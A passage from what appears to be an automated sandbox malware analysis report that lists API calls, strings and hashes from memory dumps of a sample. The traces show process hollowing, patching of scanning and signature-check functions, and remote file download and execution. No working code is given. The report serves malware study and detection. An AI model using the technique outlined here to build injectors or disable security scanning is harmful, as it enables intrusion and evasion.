                                                                                                                                                                                    • Instruction Fuzzy Hash: BCC092F13B1314BEFA10EAA42CD2F33258DDB05B00F600412BA00EE2C2D7F2AC804264
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03234BFC Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 03234C03
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2525500382-0
                                                                                                                                                                                    • Opcode ID: ccab1a8b7c3a1b25aa8eaeb71ba8686d3af44ff1fde06bb8fd8ec5b6dd6b4182
                                                                                                                                                                                    • Instruction ID: febfc00295cdb7dceb7332661e17c0ac0542d6a873cab38b1706c60f4d7be14f
                                                                                                                                                                                    • Opcode Fuzzy Hash: ccab1a8b7c3a1b25aa8eaeb71ba8686d3af44ff1fde06bb8fd8ec5b6dd6b4182
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91B012F833C30358FA18F1231E00736804C0BA3181F8C08D09E14CC0C0FD81D0D2403A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03234C14 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 03234C1B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                                                    • Opcode ID: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                                                                                                    • Instruction ID: ca5484856887f714e623fe762ba19250a7ffc021ba3d4fb3ed58144ae7351b5d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2A011EC0283230A8E0AB22A000022AA022AEC2A00388C8E80A000A0008AAAA880A028
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 032315CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,03231A03), ref: 032315E2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                    • Opcode ID: f0dd5e8c292cc0e11a3c01b9031052ca835f9b283b3703a4b988c1af3e153a8d
                                                                                                                                                                                    • Instruction ID: 02492df7b96cde47837d999aea7698f1f21dc747b1b32f6e2565f390a489162b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0dd5e8c292cc0e11a3c01b9031052ca835f9b283b3703a4b988c1af3e153a8d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F049F0751300AFEB05EF79AD843417AE2EB8A244F14C53ED609EB398E77194458B00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03231682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 032316A4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                    • Opcode ID: 3b12fa3f0a697e52538e34daf10f1661f4bfc1ce8a69d6ade804e8fa5baff26f
                                                                                                                                                                                    • Instruction ID: fb101665f560b75537aa429a0a3fd9339ce25517c59742b37bba1c55a383d64d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b12fa3f0a697e52538e34daf10f1661f4bfc1ce8a69d6ade804e8fa5baff26f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F090F2A007996BD710FF9BAC84782BB94FB02314F05413AE9089B344D7B0A8518B94
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 032316E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,03231FE4), ref: 03231704
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                    • Opcode ID: d85a9e85cf4db277b424f4eb07ada79d25b85926dbf3048e70342bdacf086764
                                                                                                                                                                                    • Instruction ID: 534f93dc67ee3345d46254f07a4731cb3f2d26bd8a6adce588fd3e5bfeaaab73
                                                                                                                                                                                    • Opcode Fuzzy Hash: d85a9e85cf4db277b424f4eb07ada79d25b85926dbf3048e70342bdacf086764
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41E086B93203116FD710BB7A5D44752ABD8EB46550F194476F501DB245D6B0F8618760
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 03249B94 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BA8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BC0
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BD2
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BE4
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD,00000000,03249F89), ref: 03249BF6
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B,?,?,03249EAD), ref: 03249C08
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,03249E1B), ref: 03249C1A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 03249C2C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 03249C3E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 03249C50
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 03249C62
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 03249C74
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 03249C86
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 03249C98
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 03249CAA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 03249CBC
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 03249CCE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                    • API String ID: 667068680-597814768
                                                                                                                                                                                    • Opcode ID: cfaf31e8facc691c7186bb8f0037cfae13eb26d34f9f1abf96cb9ece93850e6a
                                                                                                                                                                                    • Instruction ID: 707aeca27171381031244a2f352bdf6ca8b6f110ebbe488b35d2902d1181ec11
                                                                                                                                                                                    • Opcode Fuzzy Hash: cfaf31e8facc691c7186bb8f0037cfae13eb26d34f9f1abf96cb9ece93850e6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 973141B06A1328EFDB05FFB5E8C9E2E33ACAB072417505566A524CFA09D3B894C0CF11
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03247F48 Relevance: 41.9, APIs: 8, Strings: 15, Instructions: 1602nativethreadprocessCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32 ref: 03248446
                                                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,032953DC), ref: 032487DF
                                                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,032954B0,00000004,032954B8,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360), ref: 03248A3C
                                                                                                                                                                                    • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,00000000,-00000008,032954B0,00000004,032954B8), ref: 03248BB7
                                                                                                                                                                                      • Part of subcall function 03247968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                      • Part of subcall function 03247968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                      • Part of subcall function 03247968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,032954B8,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,ScanBuffer,03295360), ref: 0324920B
                                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,032954B4,00000004,032954B8,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,00000000,00000000), ref: 0324937E
                                                                                                                                                                                    • SetThreadContext.KERNEL32(00000000,032953DC), ref: 032494F4
                                                                                                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,00000000,-00000008,032954B4,00000004,032954B8), ref: 03249501
                                                                                                                                                                                      • Part of subcall function 03247AC0: LoadLibraryW.KERNEL32(bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30,ScanString,03295360,03249A30), ref: 03247AD2
                                                                                                                                                                                      • Part of subcall function 03247AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30,ScanString), ref: 03247ADF
                                                                                                                                                                                      • Part of subcall function 03247AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360), ref: 03247AF6
                                                                                                                                                                                      • Part of subcall function 03247AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30), ref: 03247B05
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                                                    • API String ID: 2533507481-2367850715
                                                                                                                                                                                    • Opcode ID: 360f82860b5b3736d029b185c6d82e8b1e5918069aa4f9352e9916c3670ca7ff
                                                                                                                                                                                    • Instruction ID: 689b4f1768614021459f19ab63ac40e3dbc39fa9f73d6a23c4a2c1df508bebe9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 360f82860b5b3736d029b185c6d82e8b1e5918069aa4f9352e9916c3670ca7ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AE2EC79A60268DFCB15FB65DC80ADE73B5AF46700F1081E2A119AF214DBB4AEC5CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03247F46 Relevance: 41.8, APIs: 8, Strings: 15, Instructions: 1553nativeprocessthreadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32 ref: 03248446
                                                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,032953DC), ref: 032487DF
                                                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,032954B0,00000004,032954B8,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360), ref: 03248A3C
                                                                                                                                                                                    • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,03295360,03249A30,ScanString,03295360,03249A30,Initialize,03295360,03249A30,00000000,-00000008,032954B0,00000004,032954B8), ref: 03248BB7
                                                                                                                                                                                      • Part of subcall function 03247968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                      • Part of subcall function 03247968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                      • Part of subcall function 03247968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                                                    • API String ID: 3979268988-2367850715
                                                                                                                                                                                    • Opcode ID: 4481c49d89287a805606a959caae6d88169b0ba4dcc9a742daf085a4cfa17a04
                                                                                                                                                                                    • Instruction ID: d8c117458d9088ac141a58dada02f4626903521f36ef610a64301559a4a96244
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4481c49d89287a805606a959caae6d88169b0ba4dcc9a742daf085a4cfa17a04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75E2EC79A60268DFCB15FB65DC80ADE73B5AF46700F1081E2A119AF214DBB4AEC5CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA7C97 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 835filesleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 15CA7CB9
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 15CA7D87
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 15CA7DA9
                                                                                                                                                                                      • Part of subcall function 15CBC291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,15D14EE0,?), ref: 15CBC2EC
                                                                                                                                                                                      • Part of subcall function 15CBC291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,15D14EE0,?), ref: 15CBC31C
                                                                                                                                                                                      • Part of subcall function 15CBC291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,15D14EE0,?), ref: 15CBC371
                                                                                                                                                                                      • Part of subcall function 15CBC291: FindClose.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3D2
                                                                                                                                                                                      • Part of subcall function 15CBC291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,15D14EE0,?), ref: 15CBC3D9
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: WaitForSingleObject.KERNEL32(?,00000000,15CA1A45,?,?,00000004,?,?,00000004,15D16B50,15D14EE0,00000000), ref: 15CA4B47
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,15D16B50,15D14EE0,00000000,?,?,?,?,?,15CA1A45), ref: 15CA4B75
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 15CA8197
                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32 ref: 15CA8278
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 15CA84C4
                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 15CA8652
                                                                                                                                                                                      • Part of subcall function 15CA880C: __EH_prolog.LIBCMT ref: 15CA8811
                                                                                                                                                                                      • Part of subcall function 15CA880C: FindFirstFileW.KERNEL32(00000000,?,15D06608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA88CA
                                                                                                                                                                                      • Part of subcall function 15CA880C: __CxxThrowException@8.LIBVCRUNTIME ref: 15CA88F2
                                                                                                                                                                                      • Part of subcall function 15CA880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA88FF
                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 15CA86F8
                                                                                                                                                                                    • StrToIntA.SHLWAPI(00000000), ref: 15CA873A
                                                                                                                                                                                      • Part of subcall function 15CBC9E2: SystemParametersInfoW.USER32 ref: 15CBCAD7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                                                                                                                    • API String ID: 1067849700-1507758755
                                                                                                                                                                                    • Opcode ID: 28cc035891f4dd2ff21f0ca49783016a6296cac8e44d9fc89aa061ac261e4a1a
                                                                                                                                                                                    • Instruction ID: d7b171eb7cb89bcd1f4ca457cf4bda772a834d9bf4d69b07dd190a983809af8f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 28cc035891f4dd2ff21f0ca49783016a6296cac8e44d9fc89aa061ac261e4a1a
                                                                                                                                                                                    • Instruction Fuzzy Hash: E6426E7BB082526BCB14EF74CDA59AF7FA5AF91280F800D1CE54257190FF25BA08C792
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 032358CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,03237338,03230000,0325B790), ref: 032358E9
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA,kernel32.dll,03237338,03230000,0325B790), ref: 03235900
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 03235930
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 03235994
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,03237338,03230000,0325B790), ref: 032359CA
